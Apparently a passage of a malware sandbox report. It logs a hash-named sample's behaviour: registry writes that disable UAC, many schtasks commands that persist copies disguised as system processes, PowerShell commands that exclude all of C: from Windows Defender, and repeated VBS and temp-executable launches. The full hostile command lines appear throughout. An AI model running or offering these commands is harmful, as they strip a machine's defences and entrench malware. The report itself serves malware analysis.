PID 4224 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe
PID 4224 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe

"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14" /sc ONLOGON /tr "'C:\Users\Default User\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Defender\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\sysmon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Windows\es-ES\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\es-ES\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Windows\es-ES\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Windows\ShellExperiences\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellExperiences\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Common Files\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\PrintHood\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Admin\PrintHood\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\PrintHood\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\fonts\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Mozilla Firefox\fonts\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Users\Default\PrintHood\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\Default\PrintHood\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\JXArPKtZVz.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8871802c-fbd3-4866-bb96-e8b1f0eab784.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ac7ffc9f-ba9e-46d6-ba56-7f58f6154415.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a74c8e64-e0a5-4767-8876-06c54256768b.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\157a85d1-e1c5-4d60-acd0-6376f75ccfe6.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f3744082-178f-4fb8-8305-22168e592630.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\468810d4-d71b-4ae5-b835-19897f8d6c88.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\936c0347-2527-44eb-9d63-5c54e41e7c93.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\950f041f-2a11-49b4-a769-b8787cb9028e.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a2523950-b7fd-45b5-a3d3-d892462873ff.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e65594d1-2841-4153-942b-9b5d307fbc07.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\78279cce-0834-4ce7-884f-51025e906453.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1a836feb-e577-49af-8e4b-1495fed3ad27.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f07b0632-e0a0-4834-9cc5-fb3ee37eef0f.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\54bd38af-87c5-48fe-9d3b-dda23650be95.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57a8059c-0609-4bf9-8e06-ecd002fac0a0.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94d97f6f-5eed-4094-a38a-b80224b700f3.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ac0d7cc6-d480-4647-8c53-892151473a8e.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e1a7b70-2c2d-4255-a4e6-67c6ef6f18cf.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe"

